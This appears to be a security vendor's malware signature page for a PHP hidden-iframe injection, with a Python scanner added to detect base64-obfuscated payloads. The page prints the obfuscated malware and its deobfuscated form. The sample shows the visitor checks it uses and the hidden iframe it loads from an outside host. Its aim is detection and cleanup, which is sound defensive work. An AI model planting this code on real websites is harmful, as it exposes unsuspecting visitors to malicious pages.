Malware Signatures

php.malware.hidden-iframe

PHP malware is one of the most common types of malicious code found on the internet, mostly because PHP is the leading server-side language used on websites,
followed by ASP, Java, ColdFusion and Perl (source).
One of the most common uses of PHP in malware is to obfuscate malicious content in files on the server and activate it only under certain conditions.
For example, instead of injecting malicious iframe code verbatim, hackers prefer to add PHP code that obfuscates the iframe injection and injects it only when
visitors come to a site for the first time, or come from search engines and social networks.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files, looking for suspicious code or files that you don't recognize. You can also sign up with us and let our team remove the malware for you.

Dump

Example of original code

<?php if(preg_match(base64_decode('Lyh5YW5kZXh8Z29vZ2xlfHlhaG9vfGJpbmd8ZG1venxhb2x8YXNrfGFsdGF2aXN0YXxseWNvcykvaQ=='),getenv(base64_decode('SFRUUF9SRUZFUkVS')))or preg_match(base64_decode('Lyhtc2llKS9p'),getenv(base64_decode('SFRUUF9VU0VSX0FHRU5U'))))echo base64_decode('PGlmcmFtZSB3aWR0aD0iMTUiIGhlaWdodD0iMTUiIGZyYW1lYm9yZGVyPSIwIiBzY3JvbGxpbmc9Im5vIiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IiBzcmM9Imh0dHA6Ly9nYWdsZS51cy8/c29mIj48L2lmcmFtZT4=');?>

Deobfuscated

<?php if(preg_match('/(yandex|google|yahoo|bing|dmoz|aol|ask|altavista|lycos)/i',getenv('HTTP_REFERER'))or preg_match('/(msie)/i',getenv('HTTP_USER_AGENT')))
echo '<iframe width="15" height="15" frameborder="0" scrolling="no" style="position:absolute;" src="http://gagle.us/?sof"></iframe>';?>
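
To support the cleanup step, the following added example (not part of the original signature page) decodes every string literal passed to base64_decode() in a PHP source string and reports whether the decoded text contains an iframe tag or the HTTP_REFERER / HTTP_USER_AGENT checks seen in the dump above. The function names, indicator labels and the example.invalid sample are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# base64_decode('<literal>') with a quoted string argument (PHP names are case-insensitive).
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""", re.I)

# Decoded content worth flagging: injected markup, and the request headers
# this signature inspects to decide whether to emit it.
INDICATORS = {
    "iframe": re.compile(r"<iframe\b", re.I),
    "referer-check": re.compile(r"HTTP_REFERER"),
    "user-agent-check": re.compile(r"HTTP_USER_AGENT"),
}

def decode_literals(php_source):
    """Return the decoded text of every base64_decode('<literal>') call."""
    decoded = []
    for match in B64_CALL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue  # argument is not valid base64; nothing to inspect
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def scan(php_source):
    """Return the sorted names of indicators found in decoded literals."""
    hits = set()
    for text in decode_literals(php_source):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)

def _enc(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample with the same shape as the dump; example.invalid is a placeholder.
SAMPLE = (
    "<?php if(preg_match(base64_decode('%s'),getenv(base64_decode('%s'))))"
    "echo base64_decode('%s');?>"
    % (_enc("/(google|bing)/i"), _enc("HTTP_REFERER"),
       _enc('<iframe width="1" height="1" src="http://example.invalid/"></iframe>'))
)
CLEAN = "<?php echo base64_decode('%s'); ?>" % _enc("hello world")

if __name__ == "__main__":
    for label, source in (("sample", SAMPLE), ("clean", CLEAN)):
        print(label, scan(source), decode_literals(source))
```

A hit is a reason to review the file by hand, not proof of infection: legitimate code also decodes base64, and this check only sees string literals, not values built at runtime.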